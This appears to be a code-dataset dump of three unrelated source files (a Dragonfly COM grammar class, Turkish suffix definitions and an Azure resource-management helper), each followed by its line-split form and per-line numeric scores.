[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
364
0
false
# # This file is part of Dragonfly. # (c) Copyright 2007, 2008 by Christo Butcher # Licensed under the LGPL. # # Dragonfly is free software: you can redistribute it and/or modify it # under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Dragonfly is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with Dragonfly. If not, see # <http://www.gnu.org/licenses/>. # """ This file implements the ConnectionGrammar class. """ from win32com.client import Dispatch from pywintypes import com_error from dragonfly.grammar.grammar_base import Grammar #--------------------------------------------------------------------------- class ConnectionGrammar(Grammar): """ Grammar class for maintaining a COM connection well within a given context. This is useful for controlling applications through COM while they are in the foreground. This grammar class will take care of dispatching the correct COM interface when the application comes to the foreground, and releasing it when the application is no longer there. * ``name`` -- name of this grammar. * ``description`` -- description for this grammar. * ``context`` -- context within which to maintain the COM connection. * ``app_name`` -- COM name to dispatch. 
""" def __init__(self, name, description=None, context=None, app_name=None): assert isinstance(app_name, basestring) or app_name == None self._app_name = app_name self._application = None Grammar.__init__(self, name=name, description=description, context=context) def __del__(self): try: self.disconnect() except Exception, error: pass #----------------------------------------------------------------------- # Methods for context management. application = property(lambda self: self._application, doc="COM handle to the application.") def enter_context(self): if self.connect(): self.connection_up() return True else: return False def exit_context(self): [r.deactivate() for r in self._rules if r.active] self.disconnect() self.connection_down() def _process_begin(self, executable, title, handle): # If not connected yet, retry. If the connection fails after # single attempt, give up. if not self._application: if not self.connect(): return False self.connection_up() return True #----------------------------------------------------------------------- # Methods for managing the application connection. def connect(self): if not self._app_name: return True try: self._application = Dispatch(self._app_name) except com_error, e: if self._log_begin: self._log_begin.warning("Grammar %s: failed to" " connect to %r: %s." % (self, self._app_name, e)) return False else: [r.activate() for r in self._rules if not r.active] return True def disconnect(self): self._application = None def connection_up(self): """ Method called immediately after entering this instance's context and successfully setting up its connection. By default this method doesn't do anything. This method should be overridden by derived classes if they need to synchronize some internal state with the application. The COM connection is available through the ``self.application`` attribute. 
""" pass def connection_down(self): """ Method called immediately after exiting this instance's context and disconnecting from the application. By default this method doesn't do anything. This method should be overridden by derived classes if they need to clean up after disconnection. """ pass
[ "#\r\n", "# This file is part of Dragonfly.\r\n", "# (c) Copyright 2007, 2008 by Christo Butcher\r\n", "# Licensed under the LGPL.\r\n", "#\r\n", "# Dragonfly is free software: you can redistribute it and/or modify it \r\n", "# under the terms of the GNU Lesser General Public License as published \r\n", "# by the Free Software Foundation, either version 3 of the License, or \r\n", "# (at your option) any later version.\r\n", "#\r\n", "# Dragonfly is distributed in the hope that it will be useful, but \r\n", "# WITHOUT ANY WARRANTY; without even the implied warranty of \r\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU \r\n", "# Lesser General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU Lesser General Public \r\n", "# License along with Dragonfly. If not, see \r\n", "# <http://www.gnu.org/licenses/>.\r\n", "#\r\n", "\r\n", "\"\"\"\r\n", " This file implements the ConnectionGrammar class.\r\n", "\"\"\"\r\n", "\r\n", "\r\n", "from win32com.client import Dispatch\r\n", "from pywintypes import com_error\r\n", "\r\n", "from dragonfly.grammar.grammar_base import Grammar\r\n", "\r\n", "\r\n", "#---------------------------------------------------------------------------\r\n", "\r\n", "class ConnectionGrammar(Grammar):\r\n", " \"\"\"\r\n", " Grammar class for maintaining a COM connection well \r\n", " within a given context. This is useful for controlling \r\n", " applications through COM while they are in the \r\n", " foreground. 
This grammar class will take care of \r\n", " dispatching the correct COM interface when the \r\n", " application comes to the foreground, and releasing it \r\n", " when the application is no longer there.\r\n", "\r\n", " * ``name`` -- name of this grammar.\r\n", " * ``description`` -- description for this grammar.\r\n", " * ``context`` -- context within which to maintain\r\n", " the COM connection.\r\n", " * ``app_name`` -- COM name to dispatch.\r\n", " \"\"\"\r\n", "\r\n", " def __init__(self, name, description=None, context=None, app_name=None):\r\n", " assert isinstance(app_name, basestring) or app_name == None\r\n", " self._app_name = app_name\r\n", " self._application = None\r\n", " Grammar.__init__(self, name=name, description=description,\r\n", " context=context)\r\n", "\r\n", " def __del__(self):\r\n", " try:\r\n", " self.disconnect()\r\n", " except Exception, error:\r\n", " pass\r\n", "\r\n", " #-----------------------------------------------------------------------\r\n", " # Methods for context management.\r\n", "\r\n", " application = property(lambda self: self._application,\r\n", " doc=\"COM handle to the application.\")\r\n", "\r\n", " def enter_context(self):\r\n", " if self.connect():\r\n", " self.connection_up()\r\n", " return True\r\n", " else:\r\n", " return False\r\n", "\r\n", " def exit_context(self):\r\n", " [r.deactivate() for r in self._rules if r.active]\r\n", " self.disconnect()\r\n", " self.connection_down()\r\n", "\r\n", " def _process_begin(self, executable, title, handle):\r\n", " # If not connected yet, retry. 
If the connection fails after\r\n", " # single attempt, give up.\r\n", " if not self._application:\r\n", " if not self.connect():\r\n", " return False\r\n", " self.connection_up()\r\n", " return True\r\n", "\r\n", " #-----------------------------------------------------------------------\r\n", " # Methods for managing the application connection.\r\n", "\r\n", " def connect(self):\r\n", " if not self._app_name:\r\n", " return True\r\n", " try:\r\n", " self._application = Dispatch(self._app_name)\r\n", " except com_error, e:\r\n", " if self._log_begin:\r\n", " self._log_begin.warning(\"Grammar %s: failed to\"\r\n", " \" connect to %r: %s.\"\r\n", " % (self, self._app_name, e))\r\n", " return False\r\n", " else:\r\n", " [r.activate() for r in self._rules if not r.active]\r\n", " return True\r\n", "\r\n", " def disconnect(self):\r\n", " self._application = None\r\n", "\r\n", " def connection_up(self):\r\n", " \"\"\"\r\n", " Method called immediately after entering this \r\n", " instance's context and successfully setting up its \r\n", " connection.\r\n", "\r\n", " By default this method doesn't do anything.\r\n", " This method should be overridden by derived classes \r\n", " if they need to synchronize some internal state with \r\n", " the application. The COM connection is available \r\n", " through the ``self.application`` attribute.\r\n", " \"\"\"\r\n", " pass\r\n", "\r\n", " def connection_down(self):\r\n", " \"\"\"\r\n", " Method called immediately after exiting this \r\n", " instance's context and disconnecting from the \r\n", " application.\r\n", "\r\n", " By default this method doesn't do anything.\r\n", " This method should be overridden by derived classes \r\n", " if they need to clean up after disconnection.\r\n", " \"\"\"\r\n", " pass\r\n" ]
[ 0, 0, 0, 0, 0, 0.013333333333333334, 0.013157894736842105, 0.013333333333333334, 0, 0, 0.014084507042253521, 0.015384615384615385, 0.013888888888888888, 0, 0, 0.014084507042253521, 0.02040816326530612, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0.016129032258064516, 0.015151515151515152, 0.017543859649122806, 0.016666666666666666, 0.017543859649122806, 0.015625, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.014492753623188406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016666666666666666, 0.015384615384615385, 0, 0, 0, 0.015151515151515152, 0.014925373134328358, 0.015625, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0.016666666666666666, 0, 0, 0, 0.015151515151515152, 0, 0, 0 ]
136
0.00291
false
#-*- coding: utf-8 -*- from . import Suffix S11 = Suffix("-cAsInA", "casına|çasına|cesine|çesine", None, True) S4 = Suffix("-sUnUz", "sınız|siniz|sunuz|sünüz", None, True) S14 = Suffix("-(y)mUş", "muş|miş|müş|mış", "y", True) S15 = Suffix("-(y)ken", "ken", "y", True) S2 = Suffix("-sUn", "sın|sin|sun|sün", None, True) S5 = Suffix("-lAr", "lar|ler", None, True) S9 = Suffix("-nUz", "nız|niz|nuz|nüz", None, True) S10 = Suffix("-DUr", "tır|tir|tur|tür|dır|dir|dur|dür", None, True) S3 = Suffix("-(y)Uz", "ız|iz|uz|üz", "y", True) S1 = Suffix("-(y)Um", "ım|im|um|üm", "y", True) S12 = Suffix("-(y)DU", "dı|di|du|dü|tı|ti|tu|tü", "y", True) S13 = Suffix("-(y)sA", "sa|se", "y", True) S6 = Suffix("-m", "m", None, True) S7 = Suffix("-n", "n", None, True) S8 = Suffix("-k", "k", None, True) # The order of the enum definition determines the priority of the suffix. # For example, -(y)ken (S15 suffix) is checked before -n (S7 suffix). VALUES = (S11,S4,S14,S15,S2,S5,S9,S10,S3,S1,S12,S13,S6,S7,S8)
[ "#-*- coding: utf-8 -*-\n", "\n", "from . import Suffix\n", "\n", "S11 = Suffix(\"-cAsInA\", \"casına|çasına|cesine|çesine\", None, True)\n", "S4 = Suffix(\"-sUnUz\", \"sınız|siniz|sunuz|sünüz\", None, True)\n", "S14 = Suffix(\"-(y)mUş\", \"muş|miş|müş|mış\", \"y\", True)\n", "S15 = Suffix(\"-(y)ken\", \"ken\", \"y\", True)\n", "S2 = Suffix(\"-sUn\", \"sın|sin|sun|sün\", None, True)\n", "S5 = Suffix(\"-lAr\", \"lar|ler\", None, True)\n", "S9 = Suffix(\"-nUz\", \"nız|niz|nuz|nüz\", None, True)\n", "S10 = Suffix(\"-DUr\", \"tır|tir|tur|tür|dır|dir|dur|dür\", None, True)\n", "S3 = Suffix(\"-(y)Uz\", \"ız|iz|uz|üz\", \"y\", True)\n", "S1 = Suffix(\"-(y)Um\", \"ım|im|um|üm\", \"y\", True)\n", "S12 = Suffix(\"-(y)DU\", \"dı|di|du|dü|tı|ti|tu|tü\", \"y\", True)\n", "S13 = Suffix(\"-(y)sA\", \"sa|se\", \"y\", True)\n", "S6 = Suffix(\"-m\", \"m\", None, True)\n", "S7 = Suffix(\"-n\", \"n\", None, True)\n", "S8 = Suffix(\"-k\", \"k\", None, True)\n", "\n", "# The order of the enum definition determines the priority of the suffix.\n", "# For example, -(y)ken (S15 suffix) is checked before -n (S7 suffix).\n", "VALUES = (S11,S4,S14,S15,S2,S5,S9,S10,S3,S1,S12,S13,S6,S7,S8)" ]
[ 0.043478260869565216, 0, 0, 0, 0, 0.013333333333333334, 0, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0, 0.013333333333333334, 0.013333333333333334, 0, 0, 0.013333333333333334, 0.013333333333333334, 0.013333333333333334, 0, 0, 0, 0.2459016393442623 ]
23
0.017799
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- from datetime import datetime, timedelta from base64 import b64decode from azure.mgmt.resource.resources import ( ResourceManagementClient, ) from azure.mgmt.resource.subscriptions import ( SubscriptionClient, ) from azure.mgmt.storage import ( StorageManagementClient, ) from azure.mgmt.storage.models import ( StorageAccountCreateParameters, ) from azure.mgmt.compute import ( ComputeManagementClient, ) from azure.mgmt.network import ( NetworkManagementClient, ) from azure.storage import AccessPolicy, CloudStorageAccount, SharedAccessPolicy from azure.storage.blob import BlobService, BlobSharedAccessPermissions from azure.storage.file import FileService from azure.storage.queue import QueueService from azure.storage.table import TableService from . 
import storage_extensions # Add some extensions to the service classes # This functionality will eventually be part of the SDK FileService.iterate_shares = storage_extensions.iterate_shares BlobService.iterate_containers = storage_extensions.iterate_containers BlobService.iterate_blobs = storage_extensions.iterate_blobs QueueService.iterate_queues = storage_extensions.iterate_queues TableService.iterate_tables = storage_extensions.iterate_tables class AccountDetails(object): def __init__(self, subscriptions=None, tenants=None): self.subscriptions = subscriptions self.tenants = tenants class SubscriptionDetails(object): def __init__(self, resource_groups=None, providers=None): self.resource_groups = resource_groups self.providers = providers class ResourceGroupDetails(object): def __init__(self, storage_accounts=None, storage_accounts_locations=None, vms=None, public_ip_addresses=None, virtual_networks=None): self.storage_accounts = storage_accounts self.storage_accounts_locations = storage_accounts_locations self.vms = vms self.public_ip_addresses = public_ip_addresses self.virtual_networks = virtual_networks class StorageAccountDetails(object): def __init__(self, account_props=None, account_keys=None, blob_containers=None, shares=None, tables=None, queues=None, blob_service_properties=None, queue_service_properties=None, table_service_properties=None): self.account_props = account_props self.account_keys = account_keys self.blob_containers = blob_containers self.shares = shares self.tables = tables self.queues = queues self.blob_service_properties = blob_service_properties self.queue_service_properties = queue_service_properties self.table_service_properties = table_service_properties class StorageAccountContainerDetails(object): def __init__(self, container_name=None, sas_policy=None, blobs=None): self.container_name = container_name self.sas_policy = sas_policy self.blobs = blobs class StorageAccountQueueDetails(object): def __init__(self, queue_name=None, 
metadata=None, messages=None): self.queue_name = queue_name self.metadata = metadata self.messages = messages class StorageAccountTableDetails(object): def __init__(self, table_name=None, entities=None, custom_fields=None): self.table_name = table_name self.entities = entities self.custom_fields = custom_fields class VMDetails(object): def __init__(self, name=None, vm=None): self.name = name self.vm = vm class VirtualNetworkDetails(object): def __init__(self, name=None, network=None): self.name = name self.network = network def get_account_details(creds): subscription_client = SubscriptionClient(creds) model = AccountDetails() model.subscriptions = list(subscription_client.subscriptions.list()) model.tenants = list(subscription_client.tenants.list()) return model def get_subscription_details(subscription_id, creds): resource_client = ResourceManagementClient(creds, subscription_id) model = SubscriptionDetails() model.resource_groups = list(resource_client.resource_groups.list()) model.providers = list(resource_client.providers.list()) return model def get_resource_group_details(subscription_id, creds, resource_group_name): storage_client = StorageManagementClient(creds, subscription_id) resource_client = ResourceManagementClient(creds, subscription_id) compute_client = ComputeManagementClient(creds, subscription_id) network_client = NetworkManagementClient(creds, subscription_id) model = ResourceGroupDetails() model.storage_accounts = list(storage_client.storage_accounts.list_by_resource_group(resource_group_name)) provider = resource_client.providers.get('Microsoft.Storage') resource_type = [r for r in provider.resource_types if r.resource_type == 'storageAccounts'][0] model.storage_accounts_locations = resource_type.locations # TODO: make an iterate function model.vms = list(compute_client.virtual_machines.list(resource_group_name)) model.public_ip_addresses = list(network_client.public_ip_addresses.list(resource_group_name)) model.virtual_networks = 
list(network_client.virtual_networks.list(resource_group_name)) return model def get_vm_details(subscription_id, creds, resource_group_name, vm_name): compute_client = ComputeManagementClient(creds, subscription_id) model = VMDetails( name=vm_name, vm=compute_client.virtual_machines.get(resource_group_name, vm_name), ) return model def get_virtual_network_details(subscription_id, creds, resource_group_name, network_name): network_client = NetworkManagementClient(creds, subscription_id) model = VirtualNetworkDetails( name=network_name, network=network_client.virtual_networks.get(resource_group_name, network_name), ) return model def get_storage_account_details(subscription_id, creds, resource_group_name, account_name): storage_client = StorageManagementClient(creds, subscription_id) account_result = storage_client.storage_accounts.get_properties( resource_group_name, account_name, ) storage_account_keys = storage_client.storage_accounts.list_keys( resource_group_name, account_name, ) account_key = storage_account_keys.key1 account = CloudStorageAccount(account_name, account_key) blob_service = account.create_blob_service() file_service = account.create_file_service() queue_service = account.create_queue_service() table_service = account.create_table_service() model = StorageAccountDetails() model.account_props = account_result model.account_keys = storage_account_keys model.blob_containers = blob_service.iterate_containers() model.queues = queue_service.iterate_queues() #TODO: find out why listing shares doesn't work #model.shares = file_service.iterate_shares() model.shares = [] model.tables = table_service.iterate_tables() model.blob_service_properties = blob_service.get_blob_service_properties() model.queue_service_properties = queue_service.get_queue_service_properties() model.table_service_properties = table_service.get_table_service_properties() return model def _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name): 
storage_client = StorageManagementClient(creds, subscription_id) storage_account_keys = storage_client.storage_accounts.list_keys( resource_group_name, account_name, ) return storage_account_keys def get_container_details(subscription_id, creds, resource_group_name, account_name, container_name): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) blob_service = BlobService(account_name, keys.key1) model = StorageAccountContainerDetails() model.container_name = container_name model.sas_policy = _get_shared_access_policy(BlobSharedAccessPermissions.READ) model.blobs = [] for blob in blob_service.iterate_blobs(container_name, include='metadata'): sas_token = blob_service.generate_shared_access_signature(container_name, blob.name, model.sas_policy) blob.sas_url = blob_service.make_blob_url(container_name, blob.name, sas_token=sas_token) raw_md5 = b64decode(blob.properties.content_md5) hex_md5 = ''.join([hex(val)[2:] for val in raw_md5]) blob.properties.content_hex_md5 = hex_md5 model.blobs.append(blob) return model def _get_shared_access_policy(permission): date_format = "%Y-%m-%dT%H:%M:%SZ" start = datetime.utcnow() - timedelta(minutes=1) expiry = start + timedelta(hours=1) return SharedAccessPolicy( AccessPolicy( start.strftime(date_format), expiry.strftime(date_format), permission, ) ) def get_queue_details(subscription_id, creds, resource_group_name, account_name, queue_name): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) queue_service = QueueService(account_name, keys.key1) model = StorageAccountQueueDetails() model.queue_name = queue_name model.metadata = queue_service.get_queue_metadata(queue_name) count = int(model.metadata.get('x-ms-approximate-messages-count', '0')) model.messages = queue_service.peek_messages(queue_name, count) if count else [] for msg in model.messages: try: msg.decoded_text = b64decode(msg.message_text).decode() except: msg.decoded_text = None return 
model def get_table_details(subscription_id, creds, resource_group_name, account_name, table_name, next_partition_key=None, next_row_key=None): keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name) table_service = TableService(account_name, keys.key1) model = StorageAccountTableDetails() model.table_name = table_name model.entities = table_service.query_entities( table_name, top=3, # small to demonstrate continuations next_partition_key=next_partition_key, next_row_key=next_row_key, ) model.custom_fields = _get_entities_custom_fields(model.entities) return model def _get_entities_custom_fields(entities): '''Get the union of all custom fields in the specified entities.''' custom_fields = set() for entity in entities: fields = dir(entity) for field in fields: if not field.startswith('_'): custom_fields.add(field) for skip_field in ['PartitionKey', 'RowKey', 'Timestamp', 'etag']: custom_fields.discard(skip_field) return custom_fields def unregister_provider(subscription_id, creds, provider_namespace): resource_client = ResourceManagementClient(creds, subscription_id) resource_client.providers.unregister(provider_namespace) def register_provider(subscription_id, creds, provider_namespace): resource_client = ResourceManagementClient(creds, subscription_id) resource_client.providers.register(provider_namespace) def create_storage_account(subscription_id, creds, resource_group_name, account_name, location, type): storage_client = StorageManagementClient(creds, subscription_id) result = storage_client.storage_accounts.create( resource_group_name, account_name, StorageAccountCreateParameters( location=location, account_type=type, ), raw=True ) return result.response def delete_storage_account(subscription_id, creds, resource_group_name, account_name): storage_client = StorageManagementClient(creds, subscription_id) result = storage_client.storage_accounts.delete( resource_group_name, account_name, ) return result def 
get_create_storage_account_status(subscription_id, creds, link): storage_client = StorageManagementClient(creds, subscription_id) request = storage_client._client.get(link) result = storage_client._client.send(request) return result
[ "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft. All rights reserved.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "#--------------------------------------------------------------------------\n", "from datetime import datetime, timedelta\n", "from base64 import b64decode\n", "\n", "from azure.mgmt.resource.resources import (\n", " ResourceManagementClient,\n", ")\n", "from azure.mgmt.resource.subscriptions import (\n", " SubscriptionClient,\n", ")\n", "from azure.mgmt.storage import (\n", " StorageManagementClient,\n", ")\n", "from azure.mgmt.storage.models import (\n", " StorageAccountCreateParameters,\n", ")\n", "from azure.mgmt.compute import (\n", " ComputeManagementClient,\n", ")\n", "from azure.mgmt.network import (\n", " NetworkManagementClient,\n", ")\n", "\n", "from azure.storage import AccessPolicy, CloudStorageAccount, SharedAccessPolicy\n", "from azure.storage.blob import BlobService, BlobSharedAccessPermissions\n", "from azure.storage.file import FileService\n", "from azure.storage.queue import QueueService\n", "from azure.storage.table import TableService\n", "\n", "from . 
import storage_extensions\n", "\n", "# Add some extensions to the service classes\n", "# This functionality will eventually be part of the SDK\n", "FileService.iterate_shares = storage_extensions.iterate_shares\n", "BlobService.iterate_containers = storage_extensions.iterate_containers\n", "BlobService.iterate_blobs = storage_extensions.iterate_blobs\n", "QueueService.iterate_queues = storage_extensions.iterate_queues\n", "TableService.iterate_tables = storage_extensions.iterate_tables\n", "\n", "\n", "class AccountDetails(object):\n", " def __init__(self, subscriptions=None, tenants=None):\n", " self.subscriptions = subscriptions\n", " self.tenants = tenants\n", "\n", "class SubscriptionDetails(object):\n", " def __init__(self, resource_groups=None, providers=None):\n", " self.resource_groups = resource_groups\n", " self.providers = providers\n", "\n", "class ResourceGroupDetails(object):\n", " def __init__(self, storage_accounts=None, storage_accounts_locations=None,\n", " vms=None, public_ip_addresses=None, virtual_networks=None):\n", " self.storage_accounts = storage_accounts\n", " self.storage_accounts_locations = storage_accounts_locations\n", " self.vms = vms\n", " self.public_ip_addresses = public_ip_addresses\n", " self.virtual_networks = virtual_networks\n", "\n", "class StorageAccountDetails(object):\n", " def __init__(self, account_props=None, account_keys=None,\n", " blob_containers=None, shares=None, tables=None, queues=None,\n", " blob_service_properties=None, queue_service_properties=None,\n", " table_service_properties=None):\n", " self.account_props = account_props\n", " self.account_keys = account_keys\n", " self.blob_containers = blob_containers\n", " self.shares = shares\n", " self.tables = tables\n", " self.queues = queues\n", " self.blob_service_properties = blob_service_properties\n", " self.queue_service_properties = queue_service_properties\n", " self.table_service_properties = table_service_properties\n", "\n", "class 
StorageAccountContainerDetails(object):\n", " def __init__(self, container_name=None, sas_policy=None, blobs=None):\n", " self.container_name = container_name\n", " self.sas_policy = sas_policy\n", " self.blobs = blobs\n", "\n", "class StorageAccountQueueDetails(object):\n", " def __init__(self, queue_name=None, metadata=None, messages=None):\n", " self.queue_name = queue_name\n", " self.metadata = metadata\n", " self.messages = messages\n", "\n", "class StorageAccountTableDetails(object):\n", " def __init__(self, table_name=None, entities=None, custom_fields=None):\n", " self.table_name = table_name\n", " self.entities = entities\n", " self.custom_fields = custom_fields\n", "\n", "class VMDetails(object):\n", " def __init__(self, name=None, vm=None):\n", " self.name = name\n", " self.vm = vm\n", "\n", "class VirtualNetworkDetails(object):\n", " def __init__(self, name=None, network=None):\n", " self.name = name\n", " self.network = network\n", "\n", "\n", "def get_account_details(creds):\n", " subscription_client = SubscriptionClient(creds)\n", "\n", " model = AccountDetails()\n", " model.subscriptions = list(subscription_client.subscriptions.list())\n", " model.tenants = list(subscription_client.tenants.list())\n", " return model\n", "\n", "def get_subscription_details(subscription_id, creds):\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", "\n", " model = SubscriptionDetails()\n", " model.resource_groups = list(resource_client.resource_groups.list())\n", " model.providers = list(resource_client.providers.list())\n", "\n", " return model\n", "\n", "def get_resource_group_details(subscription_id, creds, resource_group_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " resource_client = ResourceManagementClient(creds, subscription_id)\n", " compute_client = ComputeManagementClient(creds, subscription_id)\n", " network_client = NetworkManagementClient(creds, subscription_id)\n", "\n", " model = 
ResourceGroupDetails()\n", " model.storage_accounts = list(storage_client.storage_accounts.list_by_resource_group(resource_group_name))\n", " provider = resource_client.providers.get('Microsoft.Storage')\n", " resource_type = [r for r in provider.resource_types if r.resource_type == 'storageAccounts'][0]\n", " model.storage_accounts_locations = resource_type.locations\n", "\n", " # TODO: make an iterate function\n", " model.vms = list(compute_client.virtual_machines.list(resource_group_name))\n", " model.public_ip_addresses = list(network_client.public_ip_addresses.list(resource_group_name))\n", " model.virtual_networks = list(network_client.virtual_networks.list(resource_group_name))\n", "\n", " return model\n", "\n", "def get_vm_details(subscription_id, creds, resource_group_name, vm_name):\n", " compute_client = ComputeManagementClient(creds, subscription_id)\n", "\n", " model = VMDetails(\n", " name=vm_name,\n", " vm=compute_client.virtual_machines.get(resource_group_name, vm_name),\n", " )\n", " return model\n", "\n", "def get_virtual_network_details(subscription_id, creds, resource_group_name, network_name):\n", " network_client = NetworkManagementClient(creds, subscription_id)\n", "\n", " model = VirtualNetworkDetails(\n", " name=network_name,\n", " network=network_client.virtual_networks.get(resource_group_name, network_name),\n", " )\n", " return model\n", "\n", "def get_storage_account_details(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " account_result = storage_client.storage_accounts.get_properties(\n", " resource_group_name,\n", " account_name,\n", " )\n", " storage_account_keys = storage_client.storage_accounts.list_keys(\n", " resource_group_name,\n", " account_name,\n", " )\n", " account_key = storage_account_keys.key1\n", "\n", " account = CloudStorageAccount(account_name, account_key)\n", " blob_service = account.create_blob_service()\n", " file_service = 
account.create_file_service()\n", " queue_service = account.create_queue_service()\n", " table_service = account.create_table_service()\n", "\n", " model = StorageAccountDetails()\n", " model.account_props = account_result\n", " model.account_keys = storage_account_keys\n", " model.blob_containers = blob_service.iterate_containers()\n", " model.queues = queue_service.iterate_queues()\n", " #TODO: find out why listing shares doesn't work\n", " #model.shares = file_service.iterate_shares()\n", " model.shares = []\n", " model.tables = table_service.iterate_tables()\n", " model.blob_service_properties = blob_service.get_blob_service_properties()\n", " model.queue_service_properties = queue_service.get_queue_service_properties()\n", " model.table_service_properties = table_service.get_table_service_properties()\n", "\n", " return model\n", "\n", "def _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name):\n", " storage_client = StorageManagementClient(creds, subscription_id)\n", " storage_account_keys = storage_client.storage_accounts.list_keys(\n", " resource_group_name,\n", " account_name,\n", " )\n", " return storage_account_keys\n", "\n", "def get_container_details(subscription_id, creds, resource_group_name, account_name, container_name):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " blob_service = BlobService(account_name, keys.key1)\n", "\n", " model = StorageAccountContainerDetails()\n", " model.container_name = container_name\n", " model.sas_policy = _get_shared_access_policy(BlobSharedAccessPermissions.READ)\n", " model.blobs = []\n", " for blob in blob_service.iterate_blobs(container_name, include='metadata'):\n", " sas_token = blob_service.generate_shared_access_signature(container_name, blob.name, model.sas_policy)\n", " blob.sas_url = blob_service.make_blob_url(container_name, blob.name, sas_token=sas_token)\n", " raw_md5 = b64decode(blob.properties.content_md5)\n", " 
hex_md5 = ''.join([hex(val)[2:] for val in raw_md5])\n", " blob.properties.content_hex_md5 = hex_md5\n", " model.blobs.append(blob)\n", "\n", " return model\n", "\n", "def _get_shared_access_policy(permission):\n", " date_format = \"%Y-%m-%dT%H:%M:%SZ\"\n", " start = datetime.utcnow() - timedelta(minutes=1)\n", " expiry = start + timedelta(hours=1)\n", " return SharedAccessPolicy(\n", " AccessPolicy(\n", " start.strftime(date_format),\n", " expiry.strftime(date_format),\n", " permission,\n", " )\n", " )\n", "\n", "def get_queue_details(subscription_id, creds, resource_group_name, account_name, queue_name):\n", " keys = _get_storage_account_keys(subscription_id, creds, resource_group_name, account_name)\n", " queue_service = QueueService(account_name, keys.key1)\n", "\n", " model = StorageAccountQueueDetails()\n", " model.queue_name = queue_name\n", " model.metadata = queue_service.get_queue_metadata(queue_name)\n", " count = int(model.metadata.get('x-ms-approximate-messages-count', '0'))\n", " model.messages = queue_service.peek_messages(queue_name, count) if count else []\n", " for msg in model.messages:\n", " try:\n", " msg.decoded_text = b64decode(msg.message_text).decode()\n", " except:\n", " msg.decoded_text = None\n", "\n", " return model\n", 